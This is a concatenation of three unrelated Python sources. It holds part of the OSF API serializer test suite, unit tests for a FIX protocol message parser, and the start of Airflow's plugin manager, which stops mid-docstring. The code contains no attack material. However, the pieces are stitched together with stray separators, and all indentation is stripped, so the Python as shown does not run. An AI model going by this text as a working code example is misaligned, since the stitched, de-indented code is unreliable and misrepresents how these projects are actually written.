registration_relationships = registration_res.json['data']['relationships']
hide_if_registration_fields = [
field for field in NodeSerializer._declared_fields if isinstance(
NodeSerializer._declared_fields[field],
base_serializers.HideIfRegistration)]
for field in hide_if_registration_fields:
assert_in(field, node_relationships)
assert_not_in(field, registration_relationships)
class TestNullLinks(ApiTestCase):
def test_null_links_are_omitted(self):
req = make_drf_request_with_version(version='2.0')
rep = FakeSerializer(FakeModel, context={'request': req}).data['data']
assert_not_in('null_field', rep['links'])
assert_in('valued_field', rep['links'])
assert_not_in('null_link_field', rep['relationships'])
class TestApiBaseSerializers(ApiTestCase):
def setUp(self):
super(TestApiBaseSerializers, self).setUp()
self.user = factories.AuthUserFactory()
self.auth = factories.Auth(self.user)
self.node = factories.ProjectFactory(is_public=True)
for i in range(5):
factories.ProjectFactory(is_public=True, parent=self.node)
self.linked_node = factories.NodeFactory(
creator=self.user, is_public=True)
self.node.add_pointer(self.linked_node, auth=self.auth)
self.url = '/{}nodes/{}/'.format(API_BASE, self.node._id)
def test_serializers_have_get_absolute_url_method(self):
serializers = JSONAPISerializer.__subclasses__()
base_get_absolute_url = JSONAPISerializer.get_absolute_url
for serializer in serializers:
# Waffle endpoints are nonstandard
if serializer == WaffleSerializer or serializer == BaseWaffleSerializer:
continue
if not re.match('^(api_test|test).*', serializer.__module__):
assert hasattr(
serializer, 'get_absolute_url'
), 'No get_absolute_url method'
assert_not_equal(
serializer.get_absolute_url,
base_get_absolute_url
)
def test_counts_not_included_in_link_fields_by_default(self):
res = self.app.get(self.url)
relationships = res.json['data']['relationships']
for relation in relationships.values():
if relation == {'data': None}:
continue
if isinstance(relation, list):
for item in relation:
link = item['links'].values()[0]
link_meta = link.get('meta', {})
assert_not_in('count', link_meta)
else:
link = relation['links'].values()[0]
link_meta = link.get('meta', {})
assert_not_in('count', link_meta)
def test_counts_included_in_link_fields_with_related_counts_query_param(
self):
res = self.app.get(self.url, params={'related_counts': True})
relationships = res.json['data']['relationships']
for key, relation in relationships.items():
if relation == {}:
continue
field = NodeSerializer._declared_fields[key]
if getattr(field, 'field', None):
field = field.field
related_meta = getattr(field, 'related_meta', {})
if related_meta and related_meta.get('count', False):
link = relation['links'].values()[0]
assert_in('count', link['meta'], field)
def test_related_counts_excluded_query_param_false(self):
res = self.app.get(self.url, params={'related_counts': False})
relationships = res.json['data']['relationships']
for relation in relationships.values():
if relation == {'data': None}:
continue
if isinstance(relation, list):
for item in relation:
link = item['links'].values()[0]
link_meta = link.get('meta', {})
assert_not_in('count', link_meta)
else:
link = relation['links'].values()[0]
link_meta = link.get('meta', {})
assert_not_in('count', link_meta)
def test_invalid_related_counts_value_raises_bad_request(self):
res = self.app.get(
self.url,
params={'related_counts': 'fish'},
expect_errors=True
)
assert_equal(res.status_code, http.BAD_REQUEST)
def test_invalid_embed_value_raise_bad_request(self):
res = self.app.get(
self.url,
params={'embed': 'foo'},
expect_errors=True
)
assert_equal(res.status_code, http.BAD_REQUEST)
assert_equal(
res.json['errors'][0]['detail'],
'The following fields are not embeddable: foo'
)
def test_embed_does_not_remove_relationship(self):
res = self.app.get(self.url, params={'embed': 'root'})
assert_equal(res.status_code, 200)
assert_in(
self.url,
res.json['data']['relationships']['root']['links']['related']['href']
)
def test_counts_included_in_children_field_with_children_related_counts_query_param(
self):
res = self.app.get(self.url, params={'related_counts': 'children'})
relationships = res.json['data']['relationships']
for key, relation in relationships.items():
if relation == {}:
continue
field = NodeSerializer._declared_fields[key]
if getattr(field, 'field', None):
field = field.field
if isinstance(relation, list):
for item in relation:
link = item['links'].values()[0]
related_meta = getattr(field, 'related_meta', {})
if related_meta and related_meta.get('count', False) and key == 'children':
assert_in('count', link['meta'])
else:
assert_not_in('count', link.get('meta', {}))
elif relation != {'data': None}:
link = relation['links'].values()[0]
related_meta = getattr(field, 'related_meta', {})
if related_meta and related_meta.get('count', False) and key == 'children':
assert_in('count', link['meta'])
else:
assert_not_in('count', link.get('meta', {}))
def test_counts_included_in_children_and_contributors_fields_with_field_csv_related_counts_query_param(
self):
res = self.app.get(
self.url,
params={'related_counts': 'children,contributors'}
)
relationships = res.json['data']['relationships']
for key, relation in relationships.items():
if relation == {}:
continue
field = NodeSerializer._declared_fields[key]
if getattr(field, 'field', None):
field = field.field
if isinstance(relation, list):
for item in relation:
link = item['links'].values()[0]
related_meta = getattr(field, 'related_meta', {})
                    if related_meta and related_meta.get('count', False) and key in ('children', 'contributors'):
assert_in('count', link['meta'])
else:
assert_not_in('count', link.get('meta', {}))
elif relation != {'data': None}:
link = relation['links'].values()[0]
related_meta = getattr(field, 'related_meta', {})
                if related_meta and related_meta.get('count', False) and key in ('children', 'contributors'):
assert_in('count', link['meta'])
else:
assert_not_in('count', link.get('meta', {}))
def test_error_when_requesting_related_counts_for_attribute_field(self):
res = self.app.get(
self.url,
params={'related_counts': 'title'},
expect_errors=True
)
assert_equal(res.status_code, http.BAD_REQUEST)
assert_equal(
res.json['errors'][0]['detail'],
"Acceptable values for the related_counts query param are 'true', 'false', or any of the relationship fields; got 'title'"
)
@pytest.mark.django_db
class TestRelationshipField:
# We need a Serializer to test the Relationship field (needs context)
class BasicNodeSerializer(JSONAPISerializer):
parent = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<_id>'}
)
parent_with_meta = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<_id>'},
related_meta={'count': 'get_count', 'extra': 'get_extra'},
)
self_and_related_field = RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<_id>'},
self_view='nodes:node-contributors',
self_view_kwargs={'node_id': '<_id>'},
)
two_url_kwargs = RelationshipField(
# fake url, for testing purposes
related_view='nodes:node-pointer-detail',
related_view_kwargs={'node_id': '<_id>', 'node_link_id': '<_id>'},
)
# If related_view_kwargs is a callable, this field _must_ match the property name on
# the target record
registered_from = RelationshipField(
related_view=lambda n: 'registrations:registration-detail' if n and n.is_registration else 'nodes:node-detail',
related_view_kwargs=lambda n: {'node_id': '<registered_from._id>'})
field_with_filters = base_serializers.RelationshipField(
related_view='nodes:node-detail',
related_view_kwargs={'node_id': '<_id>'},
filter={'target': 'hello', 'woop': 'yea'}
)
class Meta:
type_ = 'nodes'
def get_count(self, obj):
return 1
def get_extra(self, obj):
return 'foo'
# TODO: Expand tests
# Regression test for https://openscience.atlassian.net/browse/OSF-4832
def test_serializing_meta(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
meta = data['relationships']['parent_with_meta']['links']['related']['meta']
assert_not_in('count', meta)
assert_in('extra', meta)
assert_equal(meta['extra'], 'foo')
def test_serializing_empty_to_one(self):
req = make_drf_request_with_version(version='2.2')
node = factories.NodeFactory()
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
        # This node was not registered_from another node, so registered_from is an empty to-one relationship.
assert 'registered_from' not in data['relationships']
# In 2.9, API returns null for empty relationships
# https://openscience.atlassian.net/browse/PLAT-840
req = make_drf_request_with_version(version='2.9')
node = factories.NodeFactory()
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
assert data['relationships']['registered_from']['data'] is None
def test_self_and_related_fields(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
relationship_field = data['relationships']['self_and_related_field']['links']
assert_in(
'/v2/nodes/{}/contributors/'.format(node._id),
relationship_field['self']['href']
)
assert_in(
'/v2/nodes/{}/'.format(node._id),
relationship_field['related']['href']
)
def test_field_with_two_kwargs(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
field = data['relationships']['two_url_kwargs']['links']
assert_in(
'/v2/nodes/{}/node_links/{}/'.format(node._id, node._id),
field['related']['href']
)
def test_field_with_two_filters(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
field = data['relationships']['field_with_filters']['links']
assert_in(
urllib.quote('filter[target]=hello', safe='?='),
field['related']['href']
)
assert_in(
urllib.quote('filter[woop]=yea', safe='?='),
field['related']['href']
)
def test_field_with_callable_related_attrs(self):
req = make_drf_request_with_version(version='2.0')
project = factories.ProjectFactory()
node = factories.NodeFactory(parent=project)
data = self.BasicNodeSerializer(
node, context={'request': req}
).data['data']
assert_not_in('registered_from', data['relationships'])
registration = factories.RegistrationFactory(project=node)
data = self.BasicNodeSerializer(
registration, context={
'request': req}
).data['data']
field = data['relationships']['registered_from']['links']
assert_in('/v2/nodes/{}/'.format(node._id), field['related']['href'])
class TestShowIfVersion(ApiTestCase):
def setUp(self):
super(TestShowIfVersion, self).setUp()
self.node = factories.NodeFactory()
self.registration = factories.RegistrationFactory()
def test_node_links_allowed_version_node_serializer(self):
req = make_drf_request_with_version(version='2.0')
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_in('node_links', data['relationships'])
def test_node_links_bad_version_node_serializer(self):
req = make_drf_request_with_version(version='2.1')
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_not_in('node_links', data['relationships'])
def test_node_links_allowed_version_registration_serializer(self):
req = make_drf_request_with_version(version='2.0')
data = RegistrationSerializer(
self.registration,
context={'request': req}
).data['data']
assert_in('node_links', data['attributes'])
def test_node_links_bad_version_registration_serializer(self):
req = make_drf_request_with_version(version='2.1')
data = RegistrationSerializer(
self.registration,
context={'request': req}
).data['data']
assert_not_in('node_links', data['attributes'])
class VersionedDateTimeField(DbTestCase):
def setUp(self):
super(VersionedDateTimeField, self).setUp()
self.node = factories.NodeFactory()
self.old_date = datetime.utcnow() # naive dates before django-osf
self.old_date_without_microseconds = self.old_date.replace(
microsecond=0)
self.new_date = datetime.utcnow().replace(
tzinfo=utc) # non-naive after django-osf
self.new_date_without_microseconds = self.new_date.replace(
microsecond=0)
self.old_format = '%Y-%m-%dT%H:%M:%S.%f'
self.old_format_without_microseconds = '%Y-%m-%dT%H:%M:%S'
self.new_format = '%Y-%m-%dT%H:%M:%S.%fZ'
def test_old_date_formats_to_old_format(self):
req = make_drf_request_with_version(version='2.0')
setattr(self.node, 'last_logged', self.old_date)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(self.old_date,self.old_format),
data['attributes']['date_modified']
)
def test_old_date_without_microseconds_formats_to_old_format(self):
req = make_drf_request_with_version(version='2.0')
setattr(self.node, 'last_logged', self.old_date_without_microseconds)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(
self.old_date_without_microseconds,
self.old_format_without_microseconds
),
data['attributes']['date_modified']
)
def test_old_date_formats_to_new_format(self):
req = make_drf_request_with_version(version='2.2')
setattr(self.node, 'last_logged', self.old_date)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(self.old_date,self.new_format),
data['attributes']['date_modified']
)
def test_old_date_without_microseconds_formats_to_new_format(self):
req = make_drf_request_with_version(version='2.2')
setattr(self.node, 'last_logged', self.old_date_without_microseconds)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(
self.old_date_without_microseconds,
self.new_format
),
data['attributes']['date_modified']
)
def test_new_date_formats_to_old_format(self):
req = make_drf_request_with_version(version='2.0')
setattr(self.node, 'last_logged', self.new_date)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(self.new_date, self.old_format),
data['attributes']['date_modified']
)
def test_new_date_without_microseconds_formats_to_old_format(self):
req = make_drf_request_with_version(version='2.0')
setattr(self.node, 'last_logged', self.new_date_without_microseconds)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(
self.new_date_without_microseconds,
self.old_format_without_microseconds
),
data['attributes']['date_modified']
)
def test_new_date_formats_to_new_format(self):
req = make_drf_request_with_version(version='2.2')
setattr(self.node, 'last_logged', self.new_date)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(self.new_date, self.new_format),
data['attributes']['date_modified']
)
def test_new_date_without_microseconds_formats_to_new_format(self):
req = make_drf_request_with_version(version='2.2')
setattr(self.node, 'last_logged', self.new_date_without_microseconds)
data = NodeSerializer(self.node, context={'request': req}).data['data']
assert_equal(
datetime.strftime(
self.new_date_without_microseconds,
self.new_format
),
data['attributes']['date_modified']
)
|
|
""" fix.parser unit tests
Copyright (c) 2014 Kenn Takara
See LICENSE for details
"""
import unittest
from fixtest.fix.parser import FIXParser
from fixtest.fix.parser import FIXParserError, FIXLengthTooLongError
from fixtest.tests.utils import to_fix
# pylint: disable=too-many-public-methods
# pylint: disable=missing-docstring
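# Note: to_fix() (imported from fixtest.tests.utils) is assumed here to join its
# arguments with the FIX SOH delimiter (\x01) and terminate the message, which is
# why the tests below can spell out fields as plain 'tag=value' strings.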
class MockFIXReceiver(object):
def __init__(self):
self.count = 0
self.last_received_message = None
self.last_error = None
def on_message_received(self, message, message_length, checksum):
# pylint: disable=unused-argument
self.count += 1
self.last_received_message = message
def on_error_received(self, error):
# pylint: disable=no-self-use
raise error
class TestFIXParserInternals(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestFIXParserInternals, self).__init__(*args, **kwargs)
self.receiver = None
def setUp(self):
self.receiver = MockFIXReceiver()
def test_parse_field(self):
""" Basic _parse_field function test """
parser = FIXParser(self.receiver)
field = parser._parse_field('8=a')
self.assertEquals(8, field[0])
self.assertEquals('a', field[1])
def test_parse_field_bad_input(self):
""" Test bad _parse_field inputs """
parser = FIXParser(self.receiver)
# missing '='
with self.assertRaises(FIXParserError):
parser._parse_field('abcde')
# bad tag id
with self.assertRaises(FIXParserError):
parser._parse_field('a=a')
# missing tag id
with self.assertRaises(FIXParserError):
parser._parse_field('=a')
# bad tag id
with self.assertRaises(FIXParserError):
parser._parse_field('10b=a')
class TestFIXParser(unittest.TestCase):
def __init__(self, *args, **kwargs):
super(TestFIXParser, self).__init__(*args, **kwargs)
self.receiver = None
def setUp(self):
self.receiver = MockFIXReceiver()
def test_simple_message(self):
""" Basic function test. """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
self.assertFalse(parser.is_parsing)
# message taken from wikipedia article
parser.on_data_received(to_fix('8=FIX.4.2',
'9=65',
'35=A',
'49=SERVER',
'56=CLIENT',
'34=177',
'52=20090107-18:15:16',
'98=0',
'108=30',
'10=062'))
self.assertFalse(parser.is_parsing)
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(10, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '65'),
(35, 'A'),
(10, '062')]))
def test_message_starts_incorrectly(self):
""" Message must start with tag 8 """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
# message does not start with tag 8
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('18=FIX.4.2',
'9=32',
'8=FIX.4.2',
'35=A',
'10=100'))
# unexpected tag 8
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'8=abcdef',
'35=A',
'10=100'))
def test_partial_message(self):
""" Test for partial input. """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
self.assertFalse(parser.is_parsing)
self.assertEquals(0, self.receiver.count)
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'35=A'))
self.assertEquals(0, self.receiver.count)
self.assertTrue(parser.is_parsing)
def test_bad_syntax(self):
""" Test for various bad syntax cases """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
# Tag ID is not a number
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'abcd=A'))
# Missing '=' and value portion
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4',
'9=32',
'35'))
# Missing tag ID portion
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4',
'9=32',
'=A'))
def test_message_too_large(self):
""" Test for too long message """
parser = FIXParser(self.receiver,
header_fields=[8, 9],
max_length=100)
with self.assertRaises(FIXLengthTooLongError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'42=A' + 'BB'*100))
def test_message_bad_binary_length(self):
""" Test for message with missing binary data """
parser = FIXParser(self.receiver,
header_fields=[8, 9],
binary_fields=[1000],
max_length=100)
# length too short
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'42=A',
'1000=2',
'1001=abababababab',
'10=000'))
# length too long
# This will not raise an error
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'42=A',
'1000=20',
'1001=ab',
'10=000'))
self.assertEquals(0, self.receiver.count)
self.assertTrue(parser.is_parsing)
# Note that we could have an error where the length of the
# binary field is longer than the message. In this case, the
# operation should time out, but that is not the responsibility of
# the parser.
def test_message_binary_too_long(self):
""" Test for message with missing binary data """
parser = FIXParser(self.receiver,
header_fields=[8, 9],
binary_fields=[1000],
max_length=100)
        # declared binary length exceeds the maximum message length
with self.assertRaises(FIXLengthTooLongError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'42=A',
'1000=128',
'1001=abababababab',
'10=000'))
def test_parser_reset(self):
""" Test that the parser resets on an error """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
# Tag ID is not a number
self.assertFalse(parser.is_parsing)
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'abcd=A'))
self.assertFalse(parser.is_parsing)
def test_bad_binary_fields(self):
""" Test bad binary fields """
parser = FIXParser(self.receiver,
binary_fields=[1000],
header_fields=[8, 9])
# Missing binary value portion of binary field
        # BUGBUG: This can cause problems, because the parser does not
        #         attempt to validate until the entire field has been
        #         read in, which fails here because the declared length
        #         runs past the end of the message.
        #         For now, live with this.
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'1000=5',
'999=11',
'10=001'))
# Missing binary length portion (the only time this
# really impacts something is if the field has an
# embedded \x01).
with self.assertRaises(FIXParserError):
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'1001=1010\x011010',
'10=001'))
parser.on_data_received(to_fix('8=FIX.4.2',
'9=14',
'1001=10101010',
'10=127'))
self.assertIsNone(self.receiver.last_error)
self.assertEquals(1, self.receiver.count)
self.assertIsNotNone(self.receiver.last_received_message)
def test_header_fields(self):
""" Header field testing. """
parser = FIXParser(self.receiver,
header_fields=[8, 9, 320])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=5',
'35=A',
'10=178'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
message[320] = 'hello there'
self.assertEquals(5, len(message))
# verify the order of the message
items = [(k, v) for k, v in message.items()]
self.assertEquals(8, items[0][0])
self.assertEquals(9, items[1][0])
self.assertEquals(320, items[2][0])
def test_binary_fields(self):
""" Binary field testing. """
parser = FIXParser(self.receiver,
binary_fields=[1000, 1010],
header_fields=[8, 9])
# Test with embedded binary \x01
parser.on_data_received(to_fix('8=FIX.4.2',
'9=18',
'1000=5',
'1001=\x01\x02\x03\x04\x05',
'10=066'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(5, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '18'),
(1000, '5'),
(1001, '\x01\x02\x03\x04\x05'),
(10, '066')]))
# Test with embedded '=' signs
parser.on_data_received(to_fix('8=FIX.4.2',
'9=18',
'1000=5',
'1001=31=20',
'10=054'))
self.assertEquals(2, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(5, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '18'),
(1000, '5'),
(1001, '31=20'),
(10, '054')]))
def test_simple_group_fields(self):
""" Simple group field testing. """
parser = FIXParser(self.receiver,
group_fields={100: [101, 102, 200],
200: [201, 202], },
header_fields=[8, 9])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=18',
'100=1',
'101=a',
'102=b',
'10=099'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(4, len(message))
self.assertTrue(100 in message)
self.assertEquals(1, len(message[100]))
group = message[100]
self.assertIsNotNone(group)
self.assertEquals(1, len(group))
self.assertEquals(2, len(group[0]))
self.assertTrue(101 in group[0])
self.assertTrue(102 in group[0])
self.assertEquals('a', group[0][101])
self.assertEquals('b', group[0][102])
def test_multiple_groups(self):
""" Test the receiving of multiple groups """
parser = FIXParser(self.receiver,
group_fields={100: [101, 102, 200],
200: [201, 202], },
header_fields=[8, 9])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=32',
'100=2',
'101=a',
'102=b',
'101=aa',
'102=bb',
'10=135'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(4, len(message))
self.assertTrue(100 in message)
self.assertEquals(2, len(message[100]))
group = message[100]
self.assertIsNotNone(group)
self.assertEquals(2, len(group))
self.assertEquals(2, len(group[0]))
self.assertTrue(101 in group[0])
self.assertTrue(102 in group[0])
self.assertEquals('a', group[0][101])
self.assertEquals('b', group[0][102])
self.assertEquals(2, len(group[1]))
self.assertTrue(101 in group[1])
self.assertTrue(102 in group[1])
self.assertEquals('aa', group[1][101])
self.assertEquals('bb', group[1][102])
def test_nested_groups(self):
""" Test the receiving of nested groups """
parser = FIXParser(self.receiver,
debug=True,
group_fields={100: [101, 102, 200],
200: [201, 202], },
header_fields=[8, 9])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=40',
'100=1',
'101=a',
'102=b',
'200=1',
'201=abc',
'202=def',
'10=087'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(4, len(message))
self.assertTrue(100 in message)
self.assertEquals(1, len(message[100]))
group = message[100]
self.assertIsNotNone(group)
self.assertEquals(1, len(group))
self.assertEquals(3, len(group[0]))
self.assertTrue(101 in group[0])
self.assertTrue(102 in group[0])
self.assertTrue(200 in group[0])
self.assertEquals('a', group[0][101])
self.assertEquals('b', group[0][102])
subgroup = group[0]
self.assertIsNotNone(subgroup)
self.assertEquals(3, len(subgroup))
self.assertEquals(1, len(subgroup[200]))
subgroup200 = subgroup[200]
self.assertEquals(2, len(subgroup200[0]))
self.assertTrue(201 in subgroup200[0])
self.assertTrue(202 in subgroup200[0])
self.assertEquals('abc', subgroup200[0][201])
self.assertEquals('def', subgroup200[0][202])
def test_multiple_message(self):
""" Receive two messages in one data buffer """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
self.assertFalse(parser.is_parsing)
parser.on_data_received(to_fix('8=FIX.4.2',
'9=5',
'35=A',
'10=178',
'8=FIX.4.2',
'9=17',
'35=E',
'99=forsooth',
'10=013'))
self.assertFalse(parser.is_parsing)
self.assertEquals(2, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(5, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '17'),
(35, 'E'),
(99, 'forsooth'),
(10, '013')]))
def test_one_byte_at_a_time(self):
""" Receive a message split up into single bytes """
parser = FIXParser(self.receiver,
header_fields=[8, 9])
text = to_fix('8=FIX.4.2',
'9=23',
'35=A',
'919=this',
'955=that',
'10=013')
for c in text:
parser.on_data_received(c)
self.assertFalse(parser.is_parsing)
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(6, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '23'),
(35, 'A'),
(919, 'this'),
(955, 'that'),
(10, '013')]))
def test_partial_binary_data(self):
""" Receive a piece of binary data split into two parts """
parser = FIXParser(self.receiver,
binary_fields=[99],
header_fields=[8, 9])
text = to_fix('8=FIX.4.2',
'9=38',
'35=A') + '99=5\x01100=12'
text2 = to_fix('345',
'919=this',
'955=that',
'10=198')
parser.on_data_received(text)
self.assertTrue(parser.is_parsing)
parser.on_data_received(text2)
self.assertFalse(parser.is_parsing)
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(8, len(message))
self.assertTrue(message.verify(fields=[(8, 'FIX.4.2'),
(9, '38'),
(35, 'A'),
(99, '5'),
(100, '12345'),
(919, 'this'),
(955, 'that'),
(10, '198')]))
def test_grouped_binary_fields(self):
""" Test binary fields that are in a group. """
parser = FIXParser(self.receiver,
debug=True,
group_fields={200: [201, 202, 99, 100]},
binary_fields=[99],
header_fields=[8, 9])
text = to_fix('8=FIX.4.2',
'9=80',
'35=A',
'200=2',
'201=aabc',
'99=5',
'100=abcde',
'201=zzzaa',
'202=myname',
'99=5',
'100=zztop',
'955=that',
'10=201')
parser.on_data_received(text)
self.assertFalse(parser.is_parsing)
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(6, len(message))
self.assertEquals(2, len(message[200]))
self.assertTrue(200 in message)
self.assertTrue(955 in message)
subgroup = message[200][0]
self.assertEquals(3, len(subgroup))
self.assertTrue(201 in subgroup)
self.assertTrue(99 in subgroup)
self.assertTrue(100 in subgroup)
subgroup = message[200][1]
self.assertEquals(4, len(subgroup))
self.assertTrue(201 in subgroup)
self.assertTrue(202 in subgroup)
self.assertTrue(99 in subgroup)
self.assertTrue(100 in subgroup)
def test_multiple_nested_groups(self):
""" Test the receiving of multiple nested groups """
parser = FIXParser(self.receiver,
debug=True,
group_fields={100: [101, 102, 200],
200: [201, 202], },
header_fields=[8, 9])
parser.on_data_received(to_fix('8=FIX.4.2',
'9=60',
'100=2',
'101=a',
'102=b',
'200=2',
'201=abc',
'202=def',
'201=zzz',
'101=c',
'102=d',
'10=002'))
self.assertEquals(1, self.receiver.count)
message = self.receiver.last_received_message
self.assertIsNotNone(message)
self.assertEquals(4, len(message))
self.assertTrue(100 in message)
self.assertEquals(2, len(message[100]))
group = message[100]
self.assertIsNotNone(group)
self.assertEquals(2, len(group))
self.assertEquals(3, len(group[0]))
self.assertTrue(101 in group[0])
self.assertTrue(102 in group[0])
self.assertTrue(200 in group[0])
self.assertEquals('a', group[0][101])
self.assertEquals('b', group[0][102])
self.assertEquals(2, len(group[1]))
self.assertTrue(101 in group[1])
self.assertTrue(102 in group[1])
self.assertTrue(200 not in group[1])
self.assertEquals('c', group[1][101])
self.assertEquals('d', group[1][102])
subgroup = group[0]
self.assertIsNotNone(subgroup)
self.assertEquals(3, len(subgroup))
self.assertEquals(2, len(subgroup[200]))
subgroup200 = subgroup[200]
self.assertEquals(2, len(subgroup200[0]))
self.assertTrue(201 in subgroup200[0])
self.assertTrue(202 in subgroup200[0])
self.assertEquals('abc', subgroup200[0][201])
self.assertEquals('def', subgroup200[0][202])
self.assertEquals(1, len(subgroup200[1]))
self.assertTrue(201 in subgroup200[1])
self.assertTrue(202 not in subgroup200[1])
self.assertEquals('zzz', subgroup200[1][201])
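# The 10=NNN trailers used throughout these tests are standard FIX checksums:
# the sum of every byte of the message up to and including the SOH delimiter
# that precedes the tag 10 field, modulo 256, zero-padded to three digits.
# A minimal sketch of that computation (it assumes the fields have already
# been joined with '\x01' separators, as to_fix() is expected to produce):
def _fix_checksum(data):
    """ Return the three-digit FIX checksum string for the given data. """
    return '%03d' % (sum(ord(c) for c in data) % 256)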
|
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import object
import imp
import inspect
import os
import re
from typing import Any, Dict, List, Set, Type
import pkg_resources
from airflow import settings
from airflow.models.baseoperator import BaseOperatorLink
from airflow.utils.log.logging_mixin import LoggingMixin
log = LoggingMixin().log
import_errors = {}
class AirflowPluginException(Exception):
pass
class AirflowPlugin(object):
name = None # type: str
operators = [] # type: List[Any]
sensors = [] # type: List[Any]
hooks = [] # type: List[Any]
executors = [] # type: List[Any]
macros = [] # type: List[Any]
admin_views = [] # type: List[Any]
flask_blueprints = [] # type: List[Any]
menu_links = [] # type: List[Any]
appbuilder_views = [] # type: List[Any]
appbuilder_menu_items = [] # type: List[Any]
# A list of global operator extra links that can redirect users to
# external systems. These extra links will be available on the
# task page in the form of buttons.
#
# Note: the global operator extra link can be overridden at each
# operator level.
global_operator_extra_links = [] # type: List[BaseOperatorLink]
# A list of operator extra links to override or add operator links
# to existing Airflow Operators.
# These extra links will be available on the task page in form of
# buttons.
operator_extra_links = [] # type: List[BaseOperatorLink]
@classmethod
def validate(cls):
if not cls.name:
raise AirflowPluginException("Your plugin needs a name.")
@classmethod
def on_load(cls, *args, **kwargs):
"""
Executed when the plugin is loaded.
This method is only called once during runtime.
        :param args: Positional arguments reserved for future use.
        :param kwargs: Keyword arguments reserved for future use.
"""
def load_entrypoint_plugins(entry_points, airflow_plugins):
"""
Load AirflowPlugin subclasses from the entrypoints
provided. The entry_point group should be 'airflow.plugins'.
